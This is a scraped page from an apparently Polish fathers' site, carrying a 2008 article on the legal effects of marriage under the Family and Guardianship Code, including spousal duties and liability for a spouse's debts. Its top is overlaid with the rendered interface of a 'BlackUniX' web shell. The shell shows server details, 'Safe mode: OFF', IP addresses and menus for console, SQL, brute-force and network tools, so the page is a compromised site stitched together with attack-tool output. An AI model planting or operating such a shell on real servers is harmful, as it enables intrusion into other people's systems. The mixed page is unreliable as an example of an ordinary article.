W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:06:03
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Za długi mojego męża nie odpowiadam, czyli skutki prawne małżeństwa.
16.03.2008.
Zapewne wielu z nas wnikliwie analizuje ważne umowy przed ich podpisaniem. Ale, kto wnikliwie studiuje Kodeks Rodzinny i Opiekuńczy przed podjęciem decyzji o małżeństwie?W tym artykule chciałbym przyjrzeć się bliżej niektórym prawnym konsekwencjom zawarcia małżeństwa. Jakie przysługują nam prawa, i jakie mamy zobowiązania.

Zasadniczo każda kobieta i każdy mężczyzna może zawrzeć związek małżeński po ukończeniu 18 roku życia

Jest jednak jeden wyjątek: Jednakże z ważnych powodów sąd opiekuńczy może zezwolić na zawarcie małżeństwa kobiecie, która ukończyła lat szesnaście, a z okoliczności wynika, że zawarcie małżeństwa będzie zgodne z dobrem założonej rodziny.


Kodeks jasno stanowi, że małżonkowie mają równe prawa i obowiązki w małżeństwie. Do obowiązków należy: wspólne pożycie, wzajemna pomoc i wierność oraz współdziałanie dla dobra rodziny, którą przez swój związek założyli.

Oboje małżonkowie obowiązani są, każdy według swych sił oraz swych możliwości zarobkowych i majątkowych, przyczyniać się do zaspokajania potrzeb rodziny, którą przez swój związek założyli. Zadośćuczynienie temu obowiązkowi może polegać także, w całości lub w części, na osobistych staraniach o wychowanie dzieci i na pracy we wspólnym gospodarstwie domowym.

Warto zwrócić uwagę na sformułowanie: każdy według swych sił oraz swych możliwości zarobkowych i majątkowych – które daje pewną swobodę w interpretacji. Tu zawsze można spierać się – kto ma jakie możliwości i siły.


Prawo zapewnia ochronę materialnych interesów rodziny: Jeżeli jeden z małżonków pozostających we wspólnym pożyciu nie spełnia ciążącego na nim obowiązku przyczyniania się do zaspokajania potrzeb rodziny, sąd może nakazać, ażeby wynagrodzenie za pracę albo inne należności przypadające temu małżonkowi były w całości lub w części wypłacane do rąk drugiego małżonka.

Prościej mówiąc, sytuacja w której przysłowiowa „żona alkoholika”, który przepija pensję, domaga się od niego co miesiąc wypłaty, może być prawnie usankcjonowana.


Z małżeństwa wynika powinowactwo między małżonkiem a krewnymi drugiego małżonka. Ale warto zaznaczyć, że trwa ono mimo ustania małżeństwa.


Za długi mojej żony nie odpowiadam. Adam Kowalski.

W KriO możemy także wyczytać: Oboje małżonkowie są odpowiedzialni solidarnie za zobowiązania zaciągnięte przez jednego z nich w sprawach wynikających z zaspokajania zwykłych potrzeb rodziny. Ale zaraz dalej czytamy: Z ważnych powodów sąd może na żądanie jednego z małżonków postanowić, że za powyższe zobowiązania odpowiedzialny jest tylko ten małżonek, który je zaciągnął. Postanowienie to może być uchylone w razie zmiany okoliczności.


Krótko mówiąc, zasadniczo odpowiadamy solidarnie za długi współmałżonka, ale jeśli wiemy, że jest na przykład hazardzistą możemy zwrócić się do sądu o wyłączenie nas z tej odpowiedzialności.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.